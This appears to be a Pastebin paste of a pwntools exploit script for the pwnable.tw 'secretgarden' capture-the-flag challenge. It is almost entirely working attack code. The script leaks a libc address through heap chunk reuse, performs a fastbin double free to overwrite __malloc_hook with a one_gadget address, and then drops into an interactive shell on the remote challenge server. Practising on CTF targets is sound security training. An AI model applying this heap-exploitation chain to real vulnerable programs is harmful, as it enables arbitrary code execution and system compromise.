Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import time
- from pwn import *
- env = {
- "LD_PRELOAD": "./libc_64.so.6"
- }
- glibc=ELF("./libc_64.so.6")
- context(os='linux', arch='i386', log_level='debug')
- GDB = 0
- listBp=[
- #0xE74,
- #0xF7A,
- 0xCD8,
- ]
- def createGDBScript(listBp,pie=False):
- script =""
- for a in listBp:
- if (pie):
- script+="b * "+str(hex(a+0x555555554000))+"\n"
- else :
- script+="b * "+str(hex(a))+"\n"
- script+="c\n"
- return script
- if len(sys.argv) >1:
- flag=1
- r = remote("chall.pwnable.tw", 10203)
- else:
- flag=0
- r = process("./secretgarden",aslr=False,env=env)
- if (GDB):
- gdb.attach(r,gdbscript=createGDBScript(listBp,pie=True))
- def add(length,name,color):
- r.sendline("1")
- r.sendlineafter("Length of the name :",str(length))
- r.sendafter("The name of flower :",name)
- r.sendlineafter("The color of the flower :",color)
- def remove(index):
- r.sendline("3")
- r.sendlineafter("Which flower do you want to remove from the garden:",str(index))
- def main():
- #First Fit Behavior
- add(0x100,"AAAAAAAA","aaaaaaaa")
- add(0x100,"BBBBBBBB","bbbbbbbb")
- remove(0)
- #Free First
- #Malloc now get the pointer of first
- add(0xc8,"x","cccccccc")
- r.sendline("2")
- #0x155555328b20<----Leak
- #0x155554f65000<----Base
- r.recvuntil("Name of the flower[2] :")
- libc=u64(r.recvuntil("\n")[:-1].ljust(8,'\x00'))-0x3c3c78
- glibc.address=libc
- log.success("libc: "+hex(libc))
- log.success("malloc_hook: "+hex(glibc.symbols['__malloc_hook']))
- remove(1)
- remove(2)
- one_gadget = glibc.address+0xef6c4
- r.sendline("4")
- r.recv()
- r.sendline("2")
- r.recv()
- #raw_input()
- #fastbin double free
- add(0x60,"1"*0x60,"0")
- add(0x60,"2"*0x60,"1")
- remove(0)
- remove(1)
- remove(0)
- add(0x60,p64(glibc.symbols['__malloc_hook']-0x23),"2")
- add(0x60,"3"*0x60,"3")
- add(0x60,"4"*0x60,"4")
- #gdb.attach(r)
- add(0x60,"A"*0x13+p64(one_gadget),'5')
- remove(0)
- remove(0)
- r.interactive()
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement